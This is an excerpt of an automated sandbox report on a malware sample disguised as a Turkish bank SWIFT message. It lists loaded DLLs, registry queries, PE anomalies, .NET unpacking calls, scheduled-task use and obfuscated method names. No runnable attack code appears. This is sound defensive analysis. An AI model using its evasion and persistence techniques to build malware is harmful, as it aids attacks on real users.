                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: NVBx.pdb source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr
                  Source: Binary string: NVBx.pdbSHA256V- source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: regasms.exe.5.drStatic PE information: 0xBC4E8C9C [Mon Feb 10 13:26:52 2070 UTC]
                  Source: AtkzppDHiyvcIR.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xa98a1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: real checksum: 0x1e857 should be: 0x1e642
                  Source: regasms.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xa98a1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: BVOtlE
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: TZlC
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Nz
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: O
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: VkmH8y1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: wN
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: F7SI
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: E6qQ
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Lr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: AN
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: f
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 5P0fnl
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: V
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: OwHk
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 6Hmqv
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: APW
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: ZLm
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 08bnu
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cnEkflK
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: J
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: xym0og
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 50
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 4
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: LQ1yM4J
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cMmi
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 2c7K
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: MB
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: WRrW
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: N8vzTDl
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: St
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: K
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: gg
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: AXK
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: g1Qden
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: hE
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: QMHTWAj
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: rW8cfn
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: rdMxwzY
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 6bxL1rP
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cv
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 0oGzWw2
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: j7XIq
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: IW9am
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: QtuG
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: mC6u2Nr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 1jPrI
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: H
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: H
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: uZp
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Top
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: ek5b
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: EhBgBta
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: El
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Xr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: xJvDR
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC835C9 push rdi; ret 5_2_6BC835D9
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC8A70E push B2BD6868h; ret 5_2_6BC8A717
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87507 push rdx; ret 5_2_6BC8751D
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC878DC push rdi; iretd 5_2_6BC8790C
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC83AE9 push rdx; ret 5_2_6BC83AF6
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC838FB push C3686868h; ret 5_2_6BC83900
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87484 push rdi; ret 5_2_6BC8748C
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC83A90 push rsi; iretd 5_2_6BC83AA7
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC87AA6 push rbx; iretd 5_2_6BC87AA7
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC838BC push 1EA16868h; iretd 5_2_6BC838C1
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC85274 push 8E8E8E05h; ret 5_2_6BC85282
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC89274 push 8E8E8E05h; ret 5_2_6BC89282
                  Source: C:\Windows\System32\rundll32.exeCode function: 5_2_6BC8D419 push rdi; ret 5_2_6BC8D41A
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 13_2_07228C13 push esp; retf 13_2_07228C19
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 15_2_092885FF push es; ret 15_2_09288610
                  Source: C:\Users\user\AppData\Roaming\regasms.exeCode function: 27_2_030F1275 push edi; ret 27_2_030F1282
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeCode function: 32_2_00F71270 push edi; ret 32_2_00F71282
                  Source: regasms.exe.5.drStatic PE information: section name: .text entropy: 7.43247692930151
                  Source: AtkzppDHiyvcIR.exe.13.drStatic PE information: section name: .text entropy: 7.43247692930151
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, pPlAdEQSYpDd771yMR.csHigh entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, LDXlpFAqBajZBU222I.csHigh entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, TwokIEltYOXQBakKStv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, Stad2JlEpOAw2rQm4DY.csHigh entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, lVRdylhA8jubWD8j1x.csHigh entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, CwmuZm6sBnW94miKIt.csHigh entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, VBsLArMNoElOWcGENd.csHigh entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, npbdMh9ZYDjxE108vq.csHigh entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, yaU42illrHtYtTMVKhc.csHigh entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, wK8RGwY2TSdWw0MbWi.csHigh entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, raWy8KSnBEG8OkGhsu.csHigh entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, niY5NKzmET1X3aCafO.csHigh entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, Uj2lPi2fHvRsqtTgiJ.csHigh entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, blTGy1n8gTX83m6JaG.csHigh entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, y6ZHmbtF4C8h68N4Sn.csHigh entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, sfIBMmm9BEghFpYZB6.csHigh entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, I8lrsDOgbkDxRsBvwr.csHigh entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, OqvIVw8VDxJKNW7onY.csHigh entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.csHigh entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, VvrwtClpAQXNMyeuTfQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, pPlAdEQSYpDd771yMR.csHigh entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, LDXlpFAqBajZBU222I.csHigh entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, TwokIEltYOXQBakKStv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, Stad2JlEpOAw2rQm4DY.csHigh entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, lVRdylhA8jubWD8j1x.csHigh entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, CwmuZm6sBnW94miKIt.csHigh entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, VBsLArMNoElOWcGENd.csHigh entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, npbdMh9ZYDjxE108vq.csHigh entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, yaU42illrHtYtTMVKhc.csHigh entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, wK8RGwY2TSdWw0MbWi.csHigh entropy of concatenated method names: 'KnPHhw513M', 'T8yHmoh9eZ', 'XIEH8r9XX0', 'vvJHWYN3Xu', 'vFHHqI3ylf', 'OqOHj5SZol', 'HEfHce1EXV', 'OQJHTnYN8g', 'Y5EHiU4gyc', 'NUeHIJCsh6'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, raWy8KSnBEG8OkGhsu.csHigh entropy of concatenated method names: 'Ahi03iBHew', 'WO80gLPrFd', 'Vc5016tF9Y', 'jsj0J9UxyQ', 'A7m0ebqWnO', 'kb50sjcNhk', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, niY5NKzmET1X3aCafO.csHigh entropy of concatenated method names: 'dth0DV8fxZ', 'F5Z0hLg0gQ', 'AU90mEsfx9', 'aHs08RdtoK', 'H7Y0W92Jwe', 'wA10qyXepC', 'CdX0jhB3vR', 'BO80BILVom', 'ewq0ohb5G3', 'hr60FQMB9T'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, Uj2lPi2fHvRsqtTgiJ.csHigh entropy of concatenated method names: 'pd5eKsqkfv', 'rIBevt86Ys', 'tyNeeIxNjV', 'FdLeGY7xiM', 'h1geVmp7Zt', 'VjyeBLcTU8', 'Dispose', 'QX4dXCas6A', 'KghdnhkAss', 'JIHd3urtWL'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, blTGy1n8gTX83m6JaG.csHigh entropy of concatenated method names: 'Dispose', 'qRslQqtTgi', 'OBa9WZhcyD', 'HPEif1OpCb', 'jN5lSBxNkw', 'U14lzZTdba', 'ProcessDialogKey', 'm5w9pPlAdE', 'YYp9lDd771', 'WMR99eaWy8'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, y6ZHmbtF4C8h68N4Sn.csHigh entropy of concatenated method names: 'wGPlJVRdyl', 'F8jlsubWD8', 'E9BlLEghFp', 'QZBl46cDXl', 'S22lK2Iiqv', 'OVwlwVDxJK', 'Yt9GOaFlfgxiF74PLx', 'OUvP8EQLoVSmh0NRb1', 'W1NllJ3PH6', 'eYOlEJn1bg'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, sfIBMmm9BEghFpYZB6.csHigh entropy of concatenated method names: 'Run3bHWN1H', 'FLO3D5CvYF', 'wqY3h3Cm8S', 'pd73mfiNpK', 'COC3KPDWVa', 'cD83w5MHLT', 'vXi3vqMAGF', 'Kke3d4uwpL', 'f6Y3erHsTS', 'IGQ30qcFN9'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, I8lrsDOgbkDxRsBvwr.csHigh entropy of concatenated method names: 'ThRJor0e35', 'wb6JFquv4o', 'CfeJklhhVR', 'TRmJbRRq8G', 'bxAJN34dWU', 'gRUJDG5fya', 'hJAJf5n9mI', 'fPIJhKaltp', 'bYmJmGNtQV', 'otyJA6OK0W'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, OqvIVw8VDxJKNW7onY.csHigh entropy of concatenated method names: 'tt21ZBWmXF', 'k7R1nM6XaS', 'Iny1gbRYdA', 'rV71JYR4RI', 'cvq1sKRU6d', 'e17gCrm8kq', 'A9Rg65AjAV', 'm0Rg2mgo4V', 'hW7gyE0AfG', 'ebJgQivrQS'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.csHigh entropy of concatenated method names: 'Y2PEZDdMVt', 'Va9EXUrBH5', 'ltSEnyrb8X', 'rIGE3cWM6L', 'GHoEg07q3G', 'OdGE15BDrj', 'CNnEJBD49m', 'gs3EsJOTfg', 'ifBEPlSa43', 'FUPELZRqh4'
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, VvrwtClpAQXNMyeuTfQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm3X0IB9gYY', 'XPi0RdKHqs', 'PZi0YXQpsg', 'LXs0xkim7B', 'VoJ0ajvegw', 'mbg0UfW8Kn', 'p4s0M2E2tl'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, pPlAdEQSYpDd771yMR.csHigh entropy of concatenated method names: 'GJ2e8O9WSR', 'L05eW5x3WJ', 'NWwe73UH4A', 'gxreqrYfn3', 'symejgxmdU', 't47er3aClP', 'q39ecaO97s', 'mLneTK9lNO', 'TiJeO0ASmI', 'XskeiAjEMn'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, LDXlpFAqBajZBU222I.csHigh entropy of concatenated method names: 'vjDgNvwIp2', 'nYJgfbqiQH', 'nWi37bdOEc', 'VhG3qetgG4', 'fAH3jKy4Dw', 'uyG3r1YKcE', 'nkr3cPpiRV', 'lyg3TiJjWI', 'b6m3Oaqvhi', 'IV03ielHWN'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, TwokIEltYOXQBakKStv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VBh5edv1Kq', 'Fmm50ELyvA', 'g715GGFcZ2', 'MZX55Bjrkd', 'QRG5VwaxAu', 'J4o5uZQiwK', 'Thv5BiNZap'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, Stad2JlEpOAw2rQm4DY.csHigh entropy of concatenated method names: 'efRGS5nSEG', 'qPvGzIZG8s', 'asB5pXxqHH', 'fsx1WjXQt9OPOyaC5hL', 'ryvAjFXjWacrp7pxeGT', 'pwKjj7XWv8SMpBgFR37', 'hI5bteXKji6ROYuo1y4', 'TxHb07X2D6UwZOe9mfb'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, lVRdylhA8jubWD8j1x.csHigh entropy of concatenated method names: 'NM3nxkUWFm', 'PcGnac2aU9', 'eP5nUfr2dd', 'bUdnM0VYTR', 'umfnCceuEM', 'Lgjn624QPu', 'voZn21rJLP', 'INwnyFECkV', 'ObsnQOJUHu', 'vktnS7yh64'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, CwmuZm6sBnW94miKIt.csHigh entropy of concatenated method names: 'ffMvywpovS', 'sLtvSLC6dB', 'LZXdpOMorr', 'NTHdlO0Zbq', 'DSnvIUt61S', 'JKtvROwpye', 'rdUvYFkbfa', 'r8Tvxmf9NA', 'T2ovaBJ4wV', 'HlbvUUgBcx'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, VBsLArMNoElOWcGENd.csHigh entropy of concatenated method names: 'D2bvL88Qp0', 'MPPv4mFxV8', 'ToString', 'fdvvXHEL1n', 'WJKvn5GLXd', 'KsNv3avZ44', 'sDSvgfxCWs', 'ucAv1MLh7S', 'E3tvJBYMV3', 'jx9vs7UR3h'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, npbdMh9ZYDjxE108vq.csHigh entropy of concatenated method names: 'X6OkWeI5Z', 'WJrbVPoSB', 'kOBDB3kTB', 'jtUf9vcom', 'b5SmyG2pU', 'uKDAtsdap', 'sOX4eZ5ql3pFuv1lGM', 'kq3U3Hq30lf2bHJqVa', 'NdRdLq3uw', 'hZE0iCtCn'
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, yaU42illrHtYtTMVKhc.csHigh entropy of concatenated method names: 'fHI0SXjXYT', 'qwM0z4sGd4', 'EggGp7hxrt', 'EAvGlQsnGe', 'bmkG9vYLXJ', 'IRGGE6jNMD', 'KhUGtEappQ', 'peLGZiGvaD', 'puVGX8RaCl', 'cuuGnyD83H'
